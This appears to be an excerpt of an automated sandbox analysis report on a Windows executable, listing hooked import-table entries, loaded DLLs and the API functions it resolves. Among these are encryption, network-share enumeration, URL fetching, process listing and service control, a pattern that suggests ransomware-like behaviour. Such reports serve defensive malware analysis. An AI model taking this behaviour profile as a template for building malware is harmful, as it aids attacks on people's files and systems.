IAT	private_0x0000000000620000:+0x5a5cf	67. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlSizeHeap+0x0 now points to private_0x000000007fff0000:+0x7fff72e9	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	68. entry of zxkgxn.exe	4 bytes	kernel32.dll:CloseHandle+0x0 now points to private_0x000000007fff0000:+0x53c66ff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	69. entry of zxkgxn.exe	4 bytes	kernel32.dll:SetLastError+0x0 now points to private_0x000000007fff0000:+0x8000fb8c	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	72. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetModuleFileNameA+0x0 now points to private_0x000000007fff0000:+0x7ffc8885	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	73. entry of zxkgxn.exe	4 bytes	kernel32.dll:WriteFile+0x0 now points to private_0x000000007fff0000:+0x7e850fff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	75. entry of zxkgxn.exe	4 bytes	kernel32.dll:QueryPerformanceCounter+0x0 now points to private_0x000000007fff0000:+0x7b99853b	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	76. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetCurrentProcessId+0x0 now points to private_0x000000007fff0000:+0x410ffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	79. entry of zxkgxn.exe	4 bytes	kernel32.dll:FreeEnvironmentStringsW+0x0 now points to private_0x0000000000050000:+0x2e884	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	83. entry of zxkgxn.exe	4 bytes	kernel32.dll:CreateEventW+0x0 now points to private_0x000000007fff0000:+0x7ffc9085	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	84. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetCurrentProcess+0x0 now points to private_0x000000007fff0000:+0x52850fff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	86. entry of zxkgxn.exe	4 bytes	kernel32.dll:TlsAlloc+0x0 now points to private_0x000000007fff0000:+0x4c8689c0	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	87. entry of zxkgxn.exe	4 bytes	kernel32.dll:TlsGetValue+0x0 now points to private_0x000000007fff0000:+0xe00fffb	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	88. entry of zxkgxn.exe	4 bytes	kernel32.dll:TlsSetValue+0x0 now points to private_0x000000007fff0000:+0x7ffce085	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	89. entry of zxkgxn.exe	4 bytes	kernel32.dll:TlsFree+0x0 now points to private_0x000000007fff0000:+0x5486c7ff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	92. entry of zxkgxn.exe	4 bytes	kernel32.dll:FatalAppExitA+0x0 now points to private_0x000000007fff0000:+0x7bd9b5ff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	93. entry of zxkgxn.exe	4 bytes	kernel32.dll:IsValidCodePage+0x0 now points to private_0x000000007fff0000:+0x6853ffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	95. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetOEMCP+0x0 now points to private_0x000000007fff0000:+0x690dc483	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	97. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetConsoleCP+0x0 now points to private_0x000000007fff0000:+0x3c3b70f	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	98. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetConsoleMode+0x0 now points to private_0x000000007fff0000:+0xf1064f8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	101. entry of zxkgxn.exe	4 bytes	kernel32.dll:FreeLibrary+0x0 now points to private_0x000000007fff0000:+0x78840000	... Actions Go to Installer Region Go to Target Region

Host Behavior

File (6)

Operation	Filename	Additional Information	Count	Logfile
Open	STD_INPUT_HANDLE	-	2	Fn
Open	STD_OUTPUT_HANDLE	-	2	Fn
Open	STD_ERROR_HANDLE	-	2	Fn

Module (306)

Operation	Module	Additional Information	Count	Logfile
Load	kernel32.dll	base_address = 0x76c20000	2	Fn
Load	RPCRT4.dll	base_address = 0x75ee0000	1	Fn
Load	MPR.dll	base_address = 0x74b30000	1	Fn
Load	WININET.dll	base_address = 0x753d0000	1	Fn
Load	WINMM.dll	base_address = 0x74af0000	1	Fn
Load	SHLWAPI.dll	base_address = 0x75340000	1	Fn
Load	KERNEL32.dll	base_address = 0x76c20000	1	Fn
Load	USER32.dll	base_address = 0x74f40000	1	Fn
Load	ADVAPI32.dll	base_address = 0x74d40000	1	Fn
Load	SHELL32.dll	base_address = 0x75fd0000	1	Fn
Load	ole32.dll	base_address = 0x755e0000	1	Fn
Load	OLEAUT32.dll	base_address = 0x75220000	1	Fn
Load	IPHLPAPI.DLL	base_address = 0x74b50000	1	Fn
Load	WS2_32.dll	base_address = 0x75bc0000	1	Fn
Load	DNSAPI.dll	base_address = 0x74a80000	1	Fn
Load	CRYPT32.dll	base_address = 0x759b0000	1	Fn
Load	msvcr100.dll	base_address = 0x749c0000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x76c20000	2	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\23aa8f91-8e4c-4e01-8a6f-bd3657c0ac36\zxkgxn.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\23aa8f91-8e4c-4e01-8a6f-bd3657c0ac36\zxkgxn.exe, size = 260	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x76c34f2b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x76c3359f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x76c31252	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x76c34208	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x76c34d28	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventExW, address_out = 0x76cb410b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x76cb4195	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadStackGuarantee, address_out = 0x76c3d31f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x76c4ee7e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x7717441c	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x7719c381	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x76c4f088	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolWait, address_out = 0x771805d7	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x7719ca24	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x77150b8c	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x771a1e1d	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalProcessorInformation, address_out = 0x76cb4761	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x76cacd11	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetDefaultDllDirectories, address_out = 0x0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesEx, address_out = 0x76cb424f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringEx, address_out = 0x76cb46b1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatEx, address_out = 0x76cc6676	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x76cb4751	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatEx, address_out = 0x76cc65f1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLocaleName, address_out = 0x76cb47c1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocaleName, address_out = 0x76cb47e1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x76cb47f1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentPackageId, address_out = 0x0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount64, address_out = 0x76c4eee0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandleExW, address_out = 0x0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileInformationByHandleW, address_out = 0x0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x76c349d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x76c31856	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtect, address_out = 0x76c3435f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x76c3186e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExA, address_out = 0x76c33519	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x76c4d802	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x76c37a10	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x76c31b00	2	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeW, address_out = 0x75f01635	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringW, address_out = 0x75f21ee5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringA, address_out = 0x75f5d918	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeA, address_out = 0x75f23fc5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidCreate, address_out = 0x75eff48b	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetCloseEnum, address_out = 0x74b32dd6	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetOpenEnumW, address_out = 0x74b32f06	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetEnumResourceW, address_out = 0x74b33058	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x753eab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlW, address_out = 0x7544be5c	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x753eb406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlA, address_out = 0x754130f1	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoW, address_out = 0x753f5c75	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x753ff18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenW, address_out = 0x753f9197	1	Fn
Get Address	c:\windows\syswow64\winmm.dll	function = timeGetTime, address_out = 0x74af26e0	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x7535a1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindFileNameW, address_out = 0x7535bb71	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x75353248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x753545bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendW, address_out = 0x753581ef	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendA, address_out = 0x7534d65e	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsA, address_out = 0x7537ad1a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x76c3110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsFree, address_out = 0x76c33587	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineW, address_out = 0x76c35223	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileA, address_out = 0x76c353c6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x76c34435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x76c317d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x76c35a4b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x76c334c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x76c3103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x76c4c807	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x76c34259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x76c31136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x76c35371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x76c31282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeA, address_out = 0x76c4ef75	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x76c31986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalAlloc, address_out = 0x76c3588e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemDirectoryW, address_out = 0x76c35063	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x76c3170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x76c3492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x76c310ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x76c5830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FormatMessageW, address_out = 0x76c34620	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpynW, address_out = 0x76c5d556	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessA, address_out = 0x76c31072	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x76c33ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x76c33f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatA, address_out = 0x76c52b7a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableA, address_out = 0x76c333a0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpW, address_out = 0x76c35929	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x76c3192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenW, address_out = 0x76c31700	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x76c3469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetShortPathNameA, address_out = 0x76c5594d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x76c359e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x76c311c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x76c311a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x76c31222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MoveFileW, address_out = 0x76c49af0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x76c34442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x76c58baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalAlloc, address_out = 0x76c3168c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x76c3183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameA, address_out = 0x76c314b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x76c5896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatW, address_out = 0x76c5828e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexA, address_out = 0x76c34c6b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FatalAppExitA, address_out = 0x76cb4691	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x76c5735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x76c31410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x76c389b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x76c32d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyW, address_out = 0x76c53102	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileA, address_out = 0x76c35444	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyA, address_out = 0x76c52a9d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetPriorityClass, address_out = 0x76c4cf28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x76c334b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x76c3dd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetExitCodeProcess, address_out = 0x76c4174d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x76c34950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalFree, address_out = 0x76c35558	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersion, address_out = 0x76c34467	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryA, address_out = 0x76c5d526	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x76c334d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsSetValue, address_out = 0x76c314fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsGetValue, address_out = 0x76c311e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsAlloc, address_out = 0x76c349ad	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetUnhandledExceptionFilter, address_out = 0x76c387c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x76c5772f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeEnvironmentStringsW, address_out = 0x76c351cb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentStringsW, address_out = 0x76c351e3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x76c311f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceCounter, address_out = 0x76c31725	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStartupInfoW, address_out = 0x76c34d40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x771645f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeZoneInformation, address_out = 0x76c3465a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RaiseException, address_out = 0x76c358a6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStringTypeW, address_out = 0x76c31946	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSize, address_out = 0x77163002	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryExW, address_out = 0x76c3495d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x7715e026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoW, address_out = 0x76c33c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocale, address_out = 0x76c4ce46	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLCID, address_out = 0x76c33da5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesW, address_out = 0x76cb425f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatW, address_out = 0x76c534d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatW, address_out = 0x76c4f481	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringW, address_out = 0x76c33bca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringW, address_out = 0x76c317b9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleCP, address_out = 0x76cd7bff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleMode, address_out = 0x76c31328	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77171f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetStdHandle, address_out = 0x76cb454f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x76c4ce2e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x76c351b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileType, address_out = 0x76c33531	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleExW, address_out = 0x76c34a6f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteConsoleW, address_out = 0x76c57aca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadConsoleW, address_out = 0x76cd739a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OutputDebugStringW, address_out = 0x76c5d1d4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleCtrlHandler, address_out = 0x76c38a09	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RtlUnwind, address_out = 0x76c5d1c3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77152270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x771522b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AreFileApisANSI, address_out = 0x76cb40d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x76c314e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThreadId, address_out = 0x76c31450	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x76c317ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCPInfo, address_out = 0x76c35189	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x76c314c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEnvironmentVariableA, address_out = 0x76c3e331	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EncodePointer, address_out = 0x77170fcb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DecodePointer, address_out = 0x77169d35	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimeAsFileTime, address_out = 0x76c33509	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x76c31809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreW, address_out = 0x76c4ca5a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetOEMCP, address_out = 0x76c5d1a1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetACP, address_out = 0x76c3179c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidCodePage, address_out = 0x76c34493	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x76c35235	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x76c354ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x76c34a5d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadCursorW, address_out = 0x74f588f7	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x74f57809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x74f5b17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = ShowWindow, address_out = 0x74f60dfb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = IsWindow, address_out = 0x74f57136	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x74f58a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UpdateWindow, address_out = 0x74f63559	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x771625dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x74f605ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostThreadMessageW, address_out = 0x74f58bff	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MessageBoxW, address_out = 0x74fafd3f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x74f5787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostQuitMessage, address_out = 0x74f59abb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x74f59a55	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SendMessageW, address_out = 0x74f59679	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetMessageW, address_out = 0x74f578e2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGetHashParam, address_out = 0x74d4df7e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x74d4df14	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenSCManagerW, address_out = 0x74d4ca64	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenServiceW, address_out = 0x74d4ca4c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x74d4e124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetUserNameW, address_out = 0x74d5157a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x74d4df36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x74d514d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x74d5469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x74d4df66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ControlService, address_out = 0x74d67144	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x74d5468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x74d4df4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptEncrypt, address_out = 0x74d6779b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptImportKey, address_out = 0x74d4c532	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = QueryServiceStatus, address_out = 0x74d52a86	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x74d546ad	1	Fn
